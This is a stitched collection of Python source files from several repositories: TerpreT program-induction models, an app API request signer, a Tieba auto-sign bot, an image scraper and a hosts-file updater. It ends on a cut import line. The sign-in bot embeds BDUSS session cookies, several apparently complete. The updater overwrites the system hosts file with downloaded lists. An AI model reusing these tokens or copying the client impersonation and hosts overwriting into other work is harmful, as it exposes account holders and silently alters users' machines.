outBool = tmpLoopBodyOutBoolVal[l, i]
arg1Int = tmpLoopBodyArg1IntVal[l, i]
arg1Ptr = tmpLoopBodyArg1PtrVal[l, i]
arg1Bool = tmpLoopBodyArg1BoolVal[l, i]
arg2Int = tmpLoopBodyArg2IntVal[l, i]
arg2Ptr = tmpLoopBodyArg2PtrVal[l, i]
arg2Bool = tmpLoopBodyArg2BoolVal[l, i]
condition = tmpLoopBodyConditionVal[l, i]
#Get the inputs:
with loopBodyInstructionsArg1[i] as r:
if r == ele1RegisterIdx:
arg1Int.set_to(curLoopElementVal1[l])
arg1Ptr.set_to(0)
arg1Bool.set_to(0)
elif r == ele2RegisterIdx:
arg1Int.set_to(curLoopElementVal2[l])
arg1Ptr.set_to(0)
arg1Bool.set_to(0)
else:
arg1Int.set_to(regIntVal[t, r])
arg1Ptr.set_to(regPtrVal[t, r])
arg1Bool.set_to(regBoolVal[t, r])
with loopBodyInstructionsArg2[i] as r:
if r == ele1RegisterIdx:
arg2Int.set_to(curLoopElementVal1[l])
arg2Ptr.set_to(0)
arg2Bool.set_to(0)
elif r == ele2RegisterIdx:
arg2Int.set_to(curLoopElementVal2[l])
arg2Ptr.set_to(0)
arg2Bool.set_to(0)
else:
arg2Int.set_to(regIntVal[t, r])
arg2Ptr.set_to(regPtrVal[t, r])
arg2Bool.set_to(regBoolVal[t, r])
with loopBodyInstructionsCondition[i] as r:
condition.set_to(regBoolVal[t, r])
#Stack pointer: number of full iterations we already
            #did * size of the loop body + how far we are in
#this one:
curStackPtr = stackPtrAtLoopStart + l * loopBodyLength + i
ExecuteInstruction(
loopBodyInstructions[i],
arg1Ptr, arg1Int, arg1Bool,
arg2Ptr, arg2Int, arg2Bool,
condition,
outPtr, outInt, outBool,
curStackPtr,
stackPtrVal[curStackPtr], stackIntVal[curStackPtr])
for r in range(registerNum):
tmpLoopBodyDoWriteReg[l, i, r].set_to(RegEqTest(loopBodyInstructionsOut[i], r))
if tmpLoopBodyDoWriteReg[l, i, r] == 0:
regIntVal[t+1, r].set_to(regIntVal[t, r])
regPtrVal[t+1, r].set_to(regPtrVal[t, r])
regBoolVal[t+1, r].set_to(regBoolVal[t, r])
elif tmpLoopBodyDoWriteReg[l, i, r] == 1:
regIntVal[t+1, r].set_to(outInt)
regPtrVal[t+1, r].set_to(outPtr)
regBoolVal[t+1, r].set_to(outBool)
#Move list pointer for next round already:
stackPtrAtLoopBodyEnd = stackPtrAtLoopStart + (l + 1) * loopBodyLength - 1
with curLoopElementPtr1[l] as curElePtr1:
if curElePtr1 < stackPtrAtLoopBodyEnd:
curLoopElementPtr1[l + 1].set_to(stackPtrVal[curElePtr1])
else:
curLoopElementPtr1[l + 1].set_to(0)
with curLoopElementPtr2[l] as curElePtr2:
if curElePtr2 < stackPtrAtLoopBodyEnd:
curLoopElementPtr2[l + 1].set_to(stackPtrVal[curElePtr2])
else:
curLoopElementPtr2[l + 1].set_to(0)
#Check if the next list element is empty:
if loop == 0: # foreach
listIsOver[l + 1].set_to(PtrIsNull(curLoopElementPtr1[l + 1],
stackPtrAtLoopBodyEnd))
elif loop == 1: # foreach zip
listIsOver[l + 1].set_to(OnePtrIsNull(curLoopElementPtr1[l + 1],
curLoopElementPtr2[l + 1],
stackPtrAtLoopBodyEnd))
elif listIsOver[l] == 1:
listIsOver[l + 1].set_to(1)
curLoopElementPtr1[l + 1].set_to(0)
curLoopElementPtr2[l + 1].set_to(0)
#We still need to initialise the stack cells for all these steps to 0:
for i in range(0, loopBodyLength):
# Copy register forwards.
t = prefixLength + l * loopBodyLength + i
for r in range(registerNum):
regPtrVal[t + 1, r].set_to(regPtrVal[t, r])
regBoolVal[t + 1, r].set_to(regBoolVal[t, r])
regIntVal[t + 1, r].set_to(regIntVal[t, r])
curStackPtr = stackPtrAtLoopStart + l * loopBodyLength + i
stackIntVal[curStackPtr].set_to(0)
stackPtrVal[curStackPtr].set_to(0)
##### Run suffix
stackPtrAtSuffixStart = stackPtrAtLoopStart + maxLoopsteps * loopBodyLength
for i in range(suffixLength):
t = prefixLength + loopBodyLength * maxLoopsteps + i
# Aliases for instruction processing. Instructions are
# of the following form: "out = op arg1 arg2", where
# arg1 and arg2 are either pointers or integers and
# are chosen based on the type of the operator.
outInt = tmpSuffixOutIntVal[i]
outPtr = tmpSuffixOutPtrVal[i]
outBool = tmpSuffixOutBoolVal[i]
arg1Int = tmpSuffixArg1IntVal[i]
arg1Ptr = tmpSuffixArg1PtrVal[i]
arg1Bool = tmpSuffixArg1BoolVal[i]
arg2Int = tmpSuffixArg2IntVal[i]
arg2Ptr = tmpSuffixArg2PtrVal[i]
arg2Bool = tmpSuffixArg2BoolVal[i]
condition = tmpSuffixConditionVal[i]
#Get the inputs:
with suffixInstructionsArg1[i] as r:
arg1Int.set_to(regIntVal[t, r])
arg1Ptr.set_to(regPtrVal[t, r])
arg1Bool.set_to(regBoolVal[t, r])
with suffixInstructionsArg2[i] as r:
arg2Int.set_to(regIntVal[t, r])
arg2Ptr.set_to(regPtrVal[t, r])
arg2Bool.set_to(regBoolVal[t, r])
with suffixInstructionsCondition[i] as r:
condition.set_to(regBoolVal[t, r])
curStackPtr = stackPtrAtSuffixStart + i
ExecuteInstruction(
suffixInstructions[i],
arg1Ptr, arg1Int, arg1Bool,
arg2Ptr, arg2Int, arg2Bool,
condition,
outPtr, outInt, outBool,
curStackPtr,
stackPtrVal[curStackPtr], stackIntVal[curStackPtr])
for r in range(registerNum):
tmpSuffixDoWriteReg[i, r].set_to(RegEqTest(suffixInstructionsOut[i], r))
if tmpSuffixDoWriteReg[i, r] == 0:
regIntVal[t+1, r].set_to(regIntVal[t, r])
regPtrVal[t+1, r].set_to(regPtrVal[t, r])
regBoolVal[t+1, r].set_to(regBoolVal[t, r])
elif tmpSuffixDoWriteReg[i, r] == 1:
regIntVal[t+1, r].set_to(outInt)
regPtrVal[t+1, r].set_to(outPtr)
regBoolVal[t+1, r].set_to(outBool)
#Copy registers to output:
outputRegIntVal.set_to(regIntVal[numTimesteps - 1, registerNum - 1])
outputRegPtrVal.set_to(regPtrVal[numTimesteps - 1, registerNum - 1])
outputRegBoolVal.set_to(regBoolVal[numTimesteps - 1, registerNum - 1])
#Copy stack to output:
outputListCopyPos = Var(stackSize)[stackSize + 1]
outputListCopyPos[0].set_to(outputRegPtrVal)
for n in range(stackSize):
with outputListCopyPos[n] as p:
outputListVal[n].set_to(stackIntVal[p])
outputListCopyPos[n + 1].set_to(stackPtrVal[p])
```
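To make the sizing formulas in this model concrete, here is the arithmetic for one illustrative (assumed, not from the source) choice of hyperparameters:
```python
# Assumed hyperparameter values, for illustration only:
inputStackSize, prefixLength, loopBodyLength, suffixLength = 2, 1, 2, 1

maxLoopsteps = inputStackSize + prefixLength                                      # 3
numTimesteps = 1 + prefixLength + (loopBodyLength * maxLoopsteps) + suffixLength  # 9
stackPtrAtPrefixStart = 1 + inputStackSize                                        # 3
stackPtrAtLoopStart = stackPtrAtPrefixStart + prefixLength                        # 4
stackSize = stackPtrAtLoopStart + maxLoopsteps * loopBodyLength + suffixLength    # 11
```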
#### File: TerpreT/models/test1.py
```python
const_T = Hyper()
const_M = Hyper()
@Runtime([const_M, const_M, const_M], const_M)
def Update(prev, cur, offset):
return (prev + cur + offset) % 2
offset = Param(const_M)
do_anything = Param(2)
initial_tape = Input(const_M)[2]
tape = Var(const_M)[const_T]
for t in range(2):
tape[t].set_to(initial_tape[t])
for t in range(2, const_T):
if do_anything == 1:
tape[t].set_to(Update(tape[t - 2], tape[t - 1], offset))
elif do_anything == 0:
tape[t].set_to(tape[t - 1])
final_tape = Output(const_M)
final_tape.set_to(tape[const_T - 1])
```
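The hypers and data files that `read_inputs` (in lib/utils.py above) expects for this model might look as follows; the configuration name and values are assumptions, and only the keys `read_inputs` actually inspects are shown:
```python
# hypers.json: configuration name -> a value for each Hyper() in the model
hypers = {"small": {"const_T": 5, "const_M": 2}}
# data.json: list of batches; read_inputs matches on 'batch_name' and 'hypers'
data_batches = [{"batch_name": "train", "hypers": "small"}]
```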
#### File: TerpreT/models/turing.py
```python
from dummy import Hyper, Param, Var, Runtime, Input, Output, Inline
numTapeSymbols = Hyper()
numHeadStates = Hyper()
tapeLength = Hyper()
numTimesteps = Hyper()
boolSize = 2
numDirections = 3
# Inputs and Output
initial_tape = Input(numTapeSymbols)[tapeLength]
final_is_halted = Output(2)
final_tape = Output(numTapeSymbols)[tapeLength]
# Turing Machine parameters
write = Param(numTapeSymbols)[numHeadStates, numTapeSymbols]
dir = Param(numDirections)[numHeadStates, numTapeSymbols]
newState = Param(numHeadStates)[numHeadStates, numTapeSymbols]
@Runtime([tapeLength, numDirections], tapeLength)
def move(pos, dir):
if dir == 0:
return pos
elif dir == 1:
return (pos + 1) % tapeLength
elif dir == 2:
return (pos - 1) % tapeLength
@Runtime([tapeLength, tapeLength], boolSize)
def EqualityTest(a, b): return 1 if a == b else 0
@Runtime([numHeadStates, numHeadStates], boolSize)
def EqualityTestState(a, b): return 1 if a == b else 0
# State of tape and head during execution:
tape = Var(numTapeSymbols)[numTimesteps, tapeLength]
curPos = Var(tapeLength)[numTimesteps]
curState = Var(numHeadStates)[numTimesteps]
isHalted = Var(boolSize)[numTimesteps]
# Temporary values:
tmpActiveCell = Var(boolSize)[numTimesteps - 1, tapeLength]
tmpCurSymbol = Var(numTapeSymbols)[numTimesteps - 1]
# Constant start state
curPos[0].set_to(0)
curState[0].set_to(1)
isHalted[0].set_to(0)
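# Note: head state 0 acts as the halting state (see the EqualityTestState
# check below), so execution starts in state 1 with the head at cell 0.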
for p in range(tapeLength):
tape[0, p].set_to(initial_tape[p])
for t in range(numTimesteps - 1):
if isHalted[t] == 1:
for m in range(tapeLength):
tape[t + 1, m].set_to(tape[t, m])
curState[t + 1].set_to(curState[t])
curPos[t + 1].set_to(curPos[t])
isHalted[t + 1].set_to(isHalted[t])
elif isHalted[t] == 0:
with curState[t] as s:
with curPos[t] as p:
with tape[t, p] as tt:
tmpCurSymbol[t].set_to(write[s, tt])
curPos[t + 1].set_to(move(p, dir[s, tt]))
curState[t + 1].set_to(newState[s, tt])
isHalted[t+1].set_to(EqualityTestState(0, curState[t + 1]))
for m in range(tapeLength):
tmpActiveCell[t, m].set_to(EqualityTest(m, curPos[t]))
if tmpActiveCell[t, m] == 1:
tape[t + 1, m].set_to(tmpCurSymbol[t])
elif tmpActiveCell[t, m] == 0:
tape[t + 1, m].set_to(tape[t, m])
final_is_halted.set_to(isHalted[numTimesteps - 1])
for p in range(tapeLength):
final_tape[p].set_to(tape[numTimesteps - 1, p])
``` |
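The `move` helper gives the machine a circular tape. A quick plain-Python check of the wrap-around behaviour, with `tapeLength` fixed for illustration:
```python
tapeLength = 5  # illustrative value

def move(pos, dir):
    if dir == 0:
        return pos                     # stay put
    elif dir == 1:
        return (pos + 1) % tapeLength  # step right, wrapping at the end
    elif dir == 2:
        return (pos - 1) % tapeLength  # step left, wrapping at cell 0

assert move(4, 1) == 0 and move(0, 2) == 4
```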
{
"source": "51bitquant/CGEncryptBreak",
"score": 2
} |
#### File: CGEncryptBreak/CGEncryptBreak/HttpReq.py
```python
__author__ = 'zxlee'
import json
import requests
from requests.cookies import RequestsCookieJar
import urlparse
import base64
import re
import Encrypt
import time
import datetime
import urllib
import operator
from collections import OrderedDict
main_url = 'http://192.168.3.11/cgapp-server/'
def json_dic(json_str):
try:
json_object = json.loads(json_str)
except ValueError, e:
json_object = {}
return json_object
def send_req(interface,data,post_type,token):
    # Sort parameters by value (descending). A plain dict would not keep this
    # order in Python 2, so an OrderedDict preserves it for urlencode below.
    data = OrderedDict(sorted(data.items(), key=lambda d: d[1], reverse=True))
data_str = urllib.urlencode(data)
url = main_url + interface
up = urlparse.urlparse(url)
timestamp = str(int(round(time.time() * 1000)))
org_headers = {
"Accept": "*/*",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-Hans-CN;q=1",
"Connection": "close",
"Content-Length":str(len(data_str)),
"Content-Type": "application/x-www-form-urlencoded",
"Host": up.netloc,
"User-Agent": "ChingoItemCGTY(Linux; iOS 12.1;iPhone HUUID/13FDADFB-0EF7-4BDE-9631-65F08BA6BC31)",
"app-key": "<KEY>",
"sign":Encrypt.get_sign(interface,data,timestamp),
"timestamp":timestamp
}
if len(token):
org_headers.update({'cgAuthorization':token})
if post_type.upper() == 'POST':
res = requests.post(url,data=data_str,headers=org_headers)
elif post_type.upper() == 'PUT':
res = requests.put(url,data=data_str,headers=org_headers)
elif post_type.upper() == 'GET':
res = requests.get(url,data=data_str,headers=org_headers)
else:
print('TypeErr')
return {}  # avoid a NameError on `res` for unsupported methods
#if res.status_code != requests.codes.ok:
return json_dic(res.text)
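# Hypothetical usage sketch (endpoint and field names are assumptions, not a documented API):
#   send_req('user/login', {'account': 'u', 'password': 'p'}, 'POST', '')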
``` |
{
"source": "51itclub/51itclub.github.io",
"score": 2
} |
#### File: 51itclub.github.io/pyAutoSign/TBSign.py
```python
import re
import time
import json
import urllib
import urllib2
import hashlib
#import threading
#from multiprocessing.pool import ThreadPool
COOKIE = {}
COOKIE['sbwtw_1'] = 'BDUSS=F<KEY>AAAGm4eFNpuHhTSU;'
COOKIE['sbwtw_2'] = 'BDUSS=<KEY>AAAKW4eFOluHhTY;'
COOKIE['sbwtw_3'] = 'BDUSS=hmbmZRR2ZrMkRIbG10M0xTOEdWd1FkdTltckpzQ3VKNG93ZEVXMzZuek1SYUJUQVFBQUFBJCQAAAAAAAAAAAEAAABR5WQwc2J3dHdfMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4eFPMuHhTTj;'
COOKIE['sbwtw_4'] = 'BDUSS=<KEY>AAAO24eFPtuHhTZ;'
COOKIE['sbwtw_5'] = 'BDUSS=<KEY>FBJCQAAAAAAAAAAAEAAAB76mQwc2J3dHdfNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA65eFMOuXhTck;'
COOKIE['sbwtw_6'] = 'BDUSS=JRSn5mTjVKVnptVWt0VGxMRlBzSmFyOWUxNXZCNDlmaVE4QmltZVR0OHN<KEY>ADl8mQwc2J3dHdfNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACy5eFMsuXhTdG;'
COOKIE['sbwtw_7'] = 'BDUSS=Eh4TjR4Rmx0OEd3Y1RtZ0JISjBCdU81STNyWURHdkdBcnRnb1pEUWVEUk1ScUJUQVFBQUFBJCQAAAAAAAAAAAEAAACP9WQwc2J3dHdfNwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEy5eFNMuXhTc;'
COOKIE['sbwtw_8'] = 'BDUSS=<KEY>AAAAGe5eFNnuXhTeE;'
class TBSign():#threading.Thread):
def __init__(self, userName, cookie):
self.timeout = 5
self.userName = userName
self.cookie = cookie
self.barList = []
self.headers = {}
self.headers['Host'] = 'tieba.baidu.com'
self.headers['Referer'] = 'http://tieba.baidu.com/#'
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
self.headers['Cookie'] = cookie
self.headers['User-Agent'] = 'Mozilla/5.0 (Linux; x86_64;) firefox 32.0 Gecko'
#threading.Thread.__init__(self)
def run(self):
if not self.checkCookie():
return None
self.getBarList()
for i in self.barList:
try:
self.sign(i)
except:
print self.userName, 'sign', i, 'failed!'
#sign
def sign(self, barName):
url = 'http://tieba.baidu.com/mo/m?kw=' + barName;
res = self.httpPost(url)
addr = re.search(r'<a\shref="([^"]+)">签到', res)
if not addr:
print self.userName, urllib.unquote(barName).decode('gbk').encode('utf-8'), 'already signed!'
return None
bduss = re.search(r'BDUSS=([^;]+);?', self.cookie)
data = {}
data['BDUSS'] = bduss.group(1)
sign = 'BDUSS=' + data['BDUSS']
data['_client_id'] = '04-00-DA-69-15-00-73-97-08-00-02-00-06-00-3C-43-01-00-34-F4-22-00-BC-35-19-01-5E-46'
sign += '_client_id=' + data['_client_id']
data['_client_type'] = '4'
sign += '_client_type=' + data['_client_type']
data['_client_version'] = '1.2.1.17'
sign += '_client_version=' + data['_client_version']
data['_phone_imei'] = '641b43b58d21b7a5814e1fd41b08e2a5'
sign += '_phone_imei=' + data['_phone_imei']
fid = re.search(r'fid"\svalue="(\w+)', res)
data['fid'] = fid.group(1)
sign += 'fid=' + data['fid']
#data['kw'] = urllib.quote(urllib.unquote(barName).decode('gbk').encode('utf-8'))
data['kw'] = urllib.unquote(barName).decode('gbk').encode('utf-8')
sign += 'kw=' + data['kw']
data['net_type'] = '3'
sign += 'net_type=' + data['net_type']
tbs = re.search(r'tbs"\svalue="(\w+)', res)
data['tbs'] = tbs.group(1)
sign += 'tbs=' + data['tbs']
sign += 'tiebaclient!!!'
data['sign'] = hashlib.md5(sign).hexdigest()
url = 'http://c.tieba.baidu.com/c/c/forum/sign'
res = self.toJson(self.httpPost(url, data))
try:
exp = res['user_info']['sign_bonus_point']
print self.userName, 'sign', urllib.unquote(barName).decode('gbk').encode('utf-8'), 'successful, add exp', exp
except:
print self.userName, urllib.unquote(barName).decode('gbk').encode('utf-8'), res
# get BarList
def getBarList(self):
page = 0
while True:
page += 1
url = 'http://tieba.baidu.com/f/like/mylike?pn=' + str(page)
res = self.httpPost(url)
if not res:
print self.userName, 'Find BarList Error'
return None
barList = re.findall(r'href="\/f\?kw=([^"]+)', res)
if len(barList):
self.barList += barList
else:
break
# check cookie
def checkCookie(self):
url = 'http://tieba.baidu.com/dc/common/tbs'
res = self.toJson(self.httpPost(url))
if res['is_login']:
self.tbs = res['tbs']
return True
else:
print self.userName, 'Cookie Error'
return None
# post
def httpPost(self, url, data = None):
if data:
data = urllib.urlencode(data)
req = urllib2.Request(url, headers=self.headers)
res = urllib2.urlopen(req, data, timeout = self.timeout)
try:
res = res.read()
except:
print self.userName, 'Http Post Error'
return None
return res
# convert json
def toJson(self, data):
try:
return json.loads(data)
except:
return None
for i in COOKIE:
#threadPool.add()
TBSign(i, COOKIE[i]).run()#.start()
```
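The request signature built in `sign()` above is an MD5 digest over the alphabetically sorted `key=value` pairs concatenated with the fixed suffix `tiebaclient!!!`. A minimal standalone sketch of that scheme (field values are placeholders, not real credentials):
```python
import hashlib

def tieba_sign(data):
    # Concatenate sorted key=value pairs, append the client suffix, and MD5 it,
    # exactly as TBSign.sign() does field by field.
    raw = ''.join('%s=%s' % (k, data[k]) for k in sorted(data)) + 'tiebaclient!!!'
    return hashlib.md5(raw.encode('utf-8')).hexdigest()

print(tieba_sign({'kw': 'example', 'fid': '123', 'tbs': 'abc'}))
```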
#### File: 51itclub.github.io/updateDomain/crawlWebsiteAndExtractInfo.py
```python
import urllib2
import re
from BeautifulSoup import BeautifulSoup
#------------------------------------------------------------------------------
def main():
userMainUrl = "http://www.songtaste.com/user/351979/"
req = urllib2.Request(userMainUrl)
resp = urllib2.urlopen(req)
respHtml = resp.read()
#print "respHtml=",respHtml # you should see the output html
print "Method 1: Use python re to extract info from html"
#<h1 class="h1user">crifan</h1>
foundH1user = re.search('<h1\s+?class="h1user">(?P<h1user>.+?)</h1>', respHtml)
print "foundH1user=",foundH1user
if foundH1user:
h1user = foundH1user.group("h1user")
print "h1user=",h1user
print "Method 2: Use python third lib BeautifulSoup to extract info from html"
songtasteHtmlEncoding = "GB2312"
soup = BeautifulSoup(respHtml, fromEncoding=songtasteHtmlEncoding)
#<h1 class="h1user">crifan</h1>
foundClassH1user = soup.find(attrs={"class":"h1user"})
print "foundClassH1user=",foundClassH1user
if foundClassH1user:
h1userStr = foundClassH1user.string
print "h1userStr=",h1userStr
###############################################################################
if __name__=="__main__":
main()
```
#### File: 51itclub.github.io/updateHostsPlus/updateHosts_1.py
```python
import urllib2
import platform
import datetime
import time
import re
import os
import shutil
import ConfigParser
import sys
import socket
import subprocess
# default setting
hosts_folder = ""
hosts_location = hosts_folder + "hosts"
source_list = ['https://raw.githubusercontent.com/vokins/simpleu/master/hosts']
not_block_sites = 0
always_on = 0
# default setting
#errorLog = open('errorLog.txt', 'a')
def get_cur_info():
return(sys._getframe().f_back.f_code.co_name)
def exit_this():
#errorLog.close()
sys.exit()
def check_connection():
sleep_seconds = 1200
i = 0
for i in range(sleep_seconds):
try:
socket.gethostbyname("www.baidu.com")
break
except socket.gaierror:
time.sleep(1)
if i == sleep_seconds - 1:
exit_this()
def check_system():
global hosts_folder
global hosts_location
if platform.system() == 'Windows':
hosts_folder = os.environ['SYSTEMROOT']+"\\System32\\drivers\\etc\\"
elif platform.system() == 'Linux'or platform.system() == 'Darwin':
hosts_folder = "/etc/"
else:
exit_this()
hosts_location = hosts_folder + "hosts"
def get_config():
global source_list
global not_block_sites
global always_on
if os.path.exists('config.ini'):
try:
# strip the BOM that Windows Notepad prepends automatically
content = open('config.ini').read()
content = re.sub(r"\xfe\xff", "", content)
content = re.sub(r"\xff\xfe", "", content)
content = re.sub(r"\xef\xbb\xbf", "", content)
open('config.ini', 'w').write(content)
config = ConfigParser.ConfigParser()
config.read('config.ini')
source_id = config.get('source_select', 'source_id')
source_list = source_id.split(",")
for i in range(len(source_list)):
source_list[i]=config.get('source_select', 'source'+source_list[i])
not_block_sites = config.get("function", "not_block_sites")
always_on = config.get("function","always_on")
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def backup_hosts():
try:
if (not os.path.isfile(hosts_folder + 'backup_hosts_original_by_updateHosts')) and \
os.path.isfile(hosts_folder + 'hosts'):
shutil.copy(hosts_folder+'hosts', hosts_folder+'backup_hosts_original_by_updateHosts')
if os.path.isfile(hosts_folder + 'hosts'):
shutil.copy(hosts_folder+'hosts', hosts_folder+'backup_hosts_last_by_updateHosts')
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def download_hosts():
try:
hosts_from_web = open("hosts_from_web", "a")  # always open; the old existence guard could leave this name undefined
for x in source_list:
#os.system("wget --no-check-certificate -c "+x+" -O hosts_from_web_tmp")
#data = open("hosts_from_web_tmp","r")
data=urllib2.urlopen(x)
#hosts_from_web.write(x+'\n')
hosts_from_web.write(data.read()+'\n')
data.close()
#os.remove('hosts_from_web_tmp')
hosts_from_web.close()
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def process_hosts():
try:
hosts_content = open('hosts', 'w')
file_from_web = open('hosts_from_web')
hosts_from_web = file_from_web.read()
file_user_defined = open('hosts_user_defined.txt')
hosts_user_defined = file_user_defined.read()
hosts_content.write('#hosts_user_defined\n')
hosts_content.write(hosts_user_defined)
hosts_content.write('\n#hosts_user_defined\n')
hosts_content.write('\n\n#hosts_by_hostsUpdate\n\n')
if not_block_sites == "1":  # compare by value, not identity
hosts_from_web = re.sub("127.0.0.1", "#not_block_sites", hosts_from_web)
hosts_content.write(hosts_from_web)
hosts_content.write('\n#hosts_by_hostsUpdate')
hosts_content.close()
file_from_web.close()
file_user_defined.close()
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def move_hosts():
try:
shutil.move("hosts", hosts_location)
os.remove('hosts_from_web')
except BaseException, e:
#errorLog.write(str(datetime.datetime.now())+'\n'+'function:'+get_cur_info()+'\nerror:'+str(e)+'\n\n')
exit_this()
def main():
check_connection()
check_system()
get_config()
backup_hosts()
download_hosts()
process_hosts()
move_hosts()
#errorLog.close()
if __name__ == '__main__':
main()
if always_on == "1":
while 1:
time.sleep(3600)
main()
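# Hypothetical config.ini sketch matching get_config() above (section/key names come
# from the code; the values shown are assumptions):
#   [source_select]
#   source_id = 1
#   source1 = https://raw.githubusercontent.com/vokins/simpleu/master/hosts
#   [function]
#   not_block_sites = 0
#   always_on = 0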
``` |
{
"source": "51MPLYR3DD/hr-python",
"score": 3
} |
#### File: hr-python/eye-identity/main.py
```python
import numpy as np
def main():
user_input = input().split()  # split on whitespace so multi-digit sizes parse too
n = int(user_input[0])
m = int(user_input[1])
print(np.eye(n, m))
if __name__ == '__main__':
main()
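# Example (input format assumed from the HackerRank prompt): feeding "3 3"
# prints the 3x3 identity matrix produced by np.eye(3, 3).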
``` |
{
"source": "51Sirius/MyBlog",
"score": 3
} |
#### File: 51Sirius/MyBlog/models.py
```python
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
db = SQLAlchemy()
class Users(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password = db.Column(db.String(255), nullable=True)
score = db.Column(db.Integer, default=0)
class_user = db.Column(db.Integer, default=5)
level = db.Column(db.Integer, default=1)
last_answer = db.Column(db.String, default=None)
snake = db.Column(db.Integer, default=0)
tetris = db.Column(db.Integer, default=0)
def set_password(self, password):
self.password = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password, password)
def __repr__(self):
return '<User {}>'.format(self.username)
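# Hypothetical usage sketch (assumes an app context and db.create_all() elsewhere):
#   u = Users(username='alice', email='[email protected]')
#   u.set_password('secret')
#   u.check_password('secret')  # -> True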
``` |
{
"source": "51xiongmao/ligui.org",
"score": 3
} |
#### File: 51xiongmao/ligui.org/ligui.org.py
```python
import requests, os
import warnings
warnings.filterwarnings("ignore")
from lxml import etree
import urllib
from urllib.request import urlopen
import re, time
def geturl(classification):
global list
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36 Edg/84.0.522.52'
}
req = urllib.request.Request("https://ligui.org/" + classification, headers=headers)
print('1. Opening URL...' + "https://ligui.org/" + classification)
website = urlopen(req,timeout=120)
html = website.read().decode('utf8')
website.close()
print('2. Searching for matching image page URLs...')
links = re.findall(r'/' + classification + '/.*?.html',html)
#links = sorted(set(links),key=links.index)
list = []
print('3. Building the list of image page URLs...')
for link in links:
aurl = 'https://ligui.org' + link
list.append(aurl)
res = requests.get("https://ligui.org/" + classification, headers=headers, verify =False).text
res = etree.HTML(res)
page = re.findall(r"\d+?\d*", str(res.xpath('/html/body/div[1]/div[8]/div[3]/ul/li[8]/a/@href')))[1]
if classification == 'beautyleg':
num = "1"
elif classification == 'iess':
num = "2"
elif classification == 'ligui':
num = "3"
elif classification == 'simu':
num = "5"
i = 2
while i < int(page)+1:
res = requests.get(url="https://ligui.org/" + classification + "/" + num + "_" + str(i) + ".html", headers=headers, verify =False).text
res = etree.HTML(res)
data = res.xpath('/html/body/div[1]/div[8]/div[1]/div/a/@href')
for j in range(len(data)):
list.append('https://ligui.org' + str(data[j]))
i += 1
list = sorted(set(list),key=list.index)
print('URL list ready; starting image downloads...')
return list
def downimg(imgurl):
newcount = len(list)
h = 1
while h < newcount:
a = 0
url = list[h]
print(url)
fo = open("url.txt", "r")
for url_list in fo.readlines():
if url_list.strip() == url.strip():
print("Already downloaded, skipping this link")
h += 1
a = 1
break
fo.close()  # close before the continue below so the handle is never leaked
if a == 1:
continue
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36 Edg/84.0.522.52'
}
list1 = []
res = requests.get(url, headers=headers, verify =False, stream=True).text
res = etree.HTML(res)
try:
title = res.xpath('/html/body/div[1]/div[5]/div/div[1]/h1/text()')[0].encode('ISO-8859-1').decode('UTF-8')
title = re.sub('[\/:*?"<>|]','',title)
except BaseException:
h += 1
error_url_txt = open('error_url.txt', 'a')
error_url_txt.write(str(url))
error_url_txt.write('\n')
error_url_txt.close()
continue
page = re.findall(r"\d+\.?\d*", str(res.xpath('/html/body/div[1]/div[5]/div/div[1]/div[3]/div[4]/ul/li[1]/a/text()')[0]))
data = res.xpath('/html/body/div[1]/div[5]/div/div[1]/div[3]/div[1]/a/img/@src')
for j in range(len(data)):
list1.append(data[j])
i = 2
while i < int(page[0])+1:
urls = url.replace(".html", "_" + str(i) + ".html");
res = requests.get(url=urls, headers=headers, verify =False, stream=True).text
res = etree.HTML(res)
data = res.xpath('/html/body/div[1]/div[5]/div/div[1]/div[3]/div[1]/a/img/@src')
for j in range(len(data)):
list1.append(data[j])
i += 1
path = './%s/' % title
if not os.path.exists(path): # create the folder if it does not exist yet
os.makedirs(path)
print("Directory created")
else:
print("Directory already exists")
print('Starting download!!!')
for i in range(len(list1)):
jpg_url = list1[i]
print(jpg_url)
try:
res = requests.get(jpg_url, verify =False, stream=True).content
except BaseException:
continue
with open('%s/%s.jpg' % (title, i), 'wb') as fp:
fp.write(res)
print('Image ' + str(i) + ' downloaded!')
#time.sleep(2)
print('Page ' + str(h) + ' finished downloading!!!')
url_txt = open('url.txt', 'a')
url_txt.write(str(url))
url_txt.write('\n')
url_txt.close()
h += 1
if __name__ == '__main__':
print('Getting ready to start...')
classification = ['beautyleg', 'iess', 'ligui', 'simu']
for i in range(len(classification)):
geturl(classification[i])
downimg(list)
``` |
{
"source": "520github/CloudBackup",
"score": 2
} |
#### File: CloudBackup/CloudBackup/cloud.py
```python
from CloudBackup.lib.vdisk import VdiskClient
from CloudBackup.lib.s3 import (S3Client, get_end_point as s3_get_end_point, ALL_USERS_URI,
